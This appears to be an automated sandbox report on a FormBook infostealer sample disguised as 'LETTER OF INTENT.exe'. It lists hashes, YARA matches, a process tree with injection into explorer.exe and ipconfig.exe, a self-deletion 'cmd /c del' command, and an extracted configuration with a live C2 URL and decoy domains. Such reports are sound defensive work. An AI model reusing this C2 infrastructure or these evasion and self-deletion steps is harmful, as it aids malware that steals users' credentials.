Windows Analysis Report
LETTER OF INTENT.exe

Overview

General Information

Sample Name:LETTER OF INTENT.exe
Analysis ID:574776
MD5:b3f43a58149d9058f8c39455869c2f84
SHA1:8f3d20b2f71e7331c355e2926a5fc5ce71e72eb8
SHA256:a04a4acf00f50f8b3c3bea38914813aa75ce4ba8c30c08971a6094c492d0d41d
Tags:exe, Formbook, xloader
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • LETTER OF INTENT.exe (PID: 6272 cmdline: "C:\Users\user\Desktop\LETTER OF INTENT.exe" MD5: B3F43A58149D9058F8C39455869C2F84)
    • LETTER OF INTENT.exe (PID: 6332 cmdline: C:\Users\user\Desktop\LETTER OF INTENT.exe MD5: B3F43A58149D9058F8C39455869C2F84)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 4528 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 5044 cmdline: /c del "C:\Users\user\Desktop\LETTER OF INTENT.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • explorer.exe (PID: 1692 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6892 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup
{"C2 list": ["www.czzhudi.com/uar3/"], "decoy": ["jogoreviravolta.com", "keysine.com", "sami60.com", "morganators.com", "referral.directory", "campdiscount.info", "vanwah.com", "jmtmjz.com", "der-transformationscode.com", "evangelvalormedia.com", "bedsidehomecare.com", "novaair.net", "privilegetroissecurity.com", "elsiepupz.com", "yy77kk.com", "nt-renewable.com", "alyaqoutalabyadhautoparts.com", "start-play-now.com", "myskew.com", "himalaya-finance.com", "purwojati.com", "freedomteaminc.com", "byaliciafryearson.com", "robocats.xyz", "eumjugamu.net", "bestofverona.guide", "aeropatrol.net", "nikisankala.com", "klassociates.info", "centroimprenta.xyz", "xn--pckwb0cye6947ajzku8opzi.com", "wasserstoff-station.net", "finpro.tech", "hydrocheats.com", "theapplewatchdoctor.com", "awridahmed.com", "barrcoplumbingsupply.com", "nbhard.com", "32342240.xyz", "photo.fail", "rebornmkt.com", "gzfs158.com", "db-propertygroup.com", "krpano.pro", "globalsovereignbank.com", "moonshot.properties", "adanary.com", "collegesecurityroadshow.net", "ddsadvocacia.com", "seo-python.com", "5gjpu.xyz", "riskprotek.com", "luckbim.com", "theperfecttrainer.com", "taxyragl.website", "ban-click.com", "mystore.guide", "katchybugonsale.com", "chinadqwx.com", "e-scooters.frl", "hentainftxxx.com", "52zf.icu", "dbhong.com", "escortworks.xyz"]}
Source | Rule | Description | Author | Strings
00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
1.0.LETTER OF INTENT.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.0.LETTER OF INTENT.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
1.0.LETTER OF INTENT.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

            Source: Process started, Author: frack113, Data: Command: C:\Users\user\Desktop\LETTER OF INTENT.exe, CommandLine: C:\Users\user\Desktop\LETTER OF INTENT.exe, CommandLine|base64offset|contains: 8, Image: C:\Users\user\Desktop\LETTER OF INTENT.exe, NewProcessName: C:\Users\user\Desktop\LETTER OF INTENT.exe, OriginalFileName: C:\Users\user\Desktop\LETTER OF INTENT.exe, ParentCommandLine: "C:\Users\user\Desktop\LETTER OF INTENT.exe" , ParentImage: C:\Users\user\Desktop\LETTER OF INTENT.exe, ParentProcessId: 6272, ProcessCommandLine: C:\Users\user\Desktop\LETTER OF INTENT.exe, ProcessId: 6332

            AV Detection

            Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: FormBook
            Source: LETTER OF INTENT.exe, Virustotal: Detection: 25%
            Source: Yara match, File source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: LETTER OF INTENT.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: LETTER OF INTENT.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: ipconfig.pdb source: LETTER OF INTENT.exe, 00000001.00000002.307642624.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307957753.0000000001150000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: ipconfig.pdbGCTL source: LETTER OF INTENT.exe, 00000001.00000002.307642624.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307957753.0000000001150000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: LETTER OF INTENT.exe, 00000001.00000002.308765964.000000000129F000.00000040.00000800.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307985320.0000000001180000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: LETTER OF INTENT.exe, 00000001.00000002.308765964.000000000129F000.00000040.00000800.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307985320.0000000001180000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe, Code function: 4x nop then pop edi, 1_2_00415672
            Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop edi, 15_2_02A15672

            Networking

            Source: Malware configuration extractor, URLs: www.czzhudi.com/uar3/

            E-Banking Fraud

            Source: Yara match, File source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0.2.LETTER OF INTENT.exe.342a3e4.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables potentially checking for WinJail sandbox window, Author: ditekSHen
            Source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: LETTER OF INTENT.exe, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.cs, Long String: Length: 53248
            Source: 0.0.LETTER OF INTENT.exe.fd0000.0.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.cs, Long String: Length: 53248
            Source: 1.0.LETTER OF INTENT.exe.670000.9.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.cs, Long String: Length: 53248
            Source: 1.0.LETTER OF INTENT.exe.670000.1.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.cs, Long String: Length: 53248
            Source: 1.0.LETTER OF INTENT.exe.670000.0.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.cs, Long String: Length: 53248
            Source: 1.0.LETTER OF INTENT.exe.670000.7.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.cs, Long String: Length: 53248
            Source: LETTER OF INTENT.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.LETTER OF INTENT.exe.342a3e4.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste, author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
            Source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
